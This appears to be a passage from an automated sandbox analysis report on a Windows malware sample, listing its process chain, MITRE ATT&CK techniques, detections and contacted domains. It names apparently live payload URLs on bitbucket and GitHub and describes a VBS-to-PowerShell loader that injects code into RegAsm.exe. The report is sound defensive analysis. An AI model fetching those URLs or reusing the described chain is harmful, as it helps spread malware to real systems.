        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF6975A8964
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6975A2C54
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting        		Valid Accounts11
        Windows Management Instrumentation        		111
        Scripting        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		OS Credential Dumping1
        System Time Discovery        		Remote Services11
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts12
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory2
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution        		1
        Registry Run Keys / Startup Folder        		211
        Process Injection        		1
        Software Packing        		Security Account Manager27
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        Command and Scripting Interpreter        		Login Hook1
        Registry Run Keys / Startup Folder        		1
        Timestomp        		NTDS21
        Security Software Discovery        		Distributed Component Object ModelInput Capture3
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts2
        PowerShell        		Network Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
        Masquerading        		Cached Domain Credentials51
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
        Virtualization/Sandbox Evasion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527751 Sample: OTO2wVGgkl.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 38 raw.githubusercontent.com 2->38 40 bitbucket.org 2->40 42 4 other IPs or domains 2->42 54 Suricata IDS alerts for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 11 other signatures 2->60 11 OTO2wVGgkl.exe 1 3 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 process4 dnsIp5 36 C:\Users\user\AppData\Local\Temp\...\123.vbs, ASCII 11->36 dropped 17 cmd.exe 3 2 11->17         started        50 127.0.0.1 unknown unknown 14->50 file6 process7 process8 19 wscript.exe 1 17->19         started        22 conhost.exe 17->22         started        signatures9 62 Suspicious powershell command line found 19->62 64 Wscript starts Powershell (via cmd or directly) 19->64 66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->66 68 Suspicious execution chain found 19->68 24 powershell.exe 7 19->24         started        process10 signatures11 70 Suspicious powershell command line found 24->70 72 Suspicious execution chain found 24->72 74 Found suspicious powershell code related to unpacking or dynamic code loading 24->74 27 powershell.exe 14 25 24->27         started        31 conhost.exe 24->31         started        process12 dnsIp13 44 raw.githubusercontent.com 185.199.111.133, 443, 49725 FASTLYUS Netherlands 27->44 46 bitbucket.org 185.166.143.48, 443, 49752 AMAZON-02US Germany 27->46 48 s3-w.us-east-1.amazonaws.com 16.182.70.97, 443, 49760 unknown United States 27->48 76 Writes to foreign memory regions 27->76 78 Injects a PE file into a foreign processes 27->78 80 Loading BitLocker PowerShell Module 27->80 33 RegAsm.exe 3 27->33         started        signatures14 process15 signatures16 52 Reads the System eventlog 33->52

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        OTO2wVGgkl.exe11%ReversingLabs
        OTO2wVGgkl.exe21%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
        bitbucket.org0%VirustotalBrowse
        raw.githubusercontent.com0%VirustotalBrowse
        bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
        18.31.95.13.in-addr.arpa0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore60%URL Reputationsafe
        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://bitbucket.org/rulmerurk/ertertqw/downloads/po06.txt2%VirustotalBrowse
        https://bbuseruploads.s3.amazonaws.com1%VirustotalBrowse
        https://web-security-reports.services.atlassian.com/csp-report/bb-website0%VirustotalBrowse
        https://dz8aopenkvv6s.cloudfront.net0%VirustotalBrowse
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%VirustotalBrowse
        https://github.com/Pester/Pester1%VirustotalBrowse
        https://g.live.com/odclientsettings/Prod1C:0%VirustotalBrowse
        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
        https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%VirustotalBrowse
        https://raw.githubusercontent.com0%VirustotalBrowse
        https://cdn.cookielaw.org/0%VirustotalBrowse
        https://aui-cdn.atlassian.com/0%VirustotalBrowse
        https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?144417233%VirustotalBrowse
        https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?118117350%VirustotalBrowse
        https://bitbucket.org0%VirustotalBrowse
        https://remote-app-switcher.stg-east.frontend.public.atl-paas.net0%VirustotalBrowse
        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        s3-w.us-east-1.amazonaws.com
        		16.182.70.97
        		truefalseunknown
        bitbucket.org
        		185.166.143.48
        		truetrueunknown
        raw.githubusercontent.com
        		185.199.111.133
        		truetrueunknown
        bbuseruploads.s3.amazonaws.com
        		unknown
        		unknownfalseunknown
        18.31.95.13.in-addr.arpa
        		unknown
        		unknownfalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://bitbucket.org/rulmerurk/ertertqw/downloads/po06.txtfalseunknown
        https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723trueunknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F7BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F794000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://go.micropowershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943FB37000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://contoso.com/Licensepowershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Iconpowershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F7BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F794000.00000004.00000800.00020000.00000000.sdmpfalse
          		unknown
          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000A.00000003.2293868995.0000025084720000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drfalse
            		unknown
            http://crl.ver)svchost.exe, 0000000A.00000002.3436851309.0000025084884000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://aka.ms/pscore6powershell.exe, 00000006.00000002.2635327490.00000188234FD000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://g.live.com/odclientsettings/Prod1C:qmgr.db.10.drfalseunknown
              https://raw.githubusercontent.compowershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmptrueunknown
              https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cdn.cookielaw.org/powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://contoso.com/powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aui-cdn.atlassian.com/powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735powershell.exe, 00000006.00000002.2635327490.0000018823A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438316000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338796491.00000194384F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943E611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2339496899.0000019439D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.00000194382A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmptrueunknown
                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://aka.ms/pscore68powershell.exe, 00000006.00000002.2635327490.0000018823550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2635327490.00000188234E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
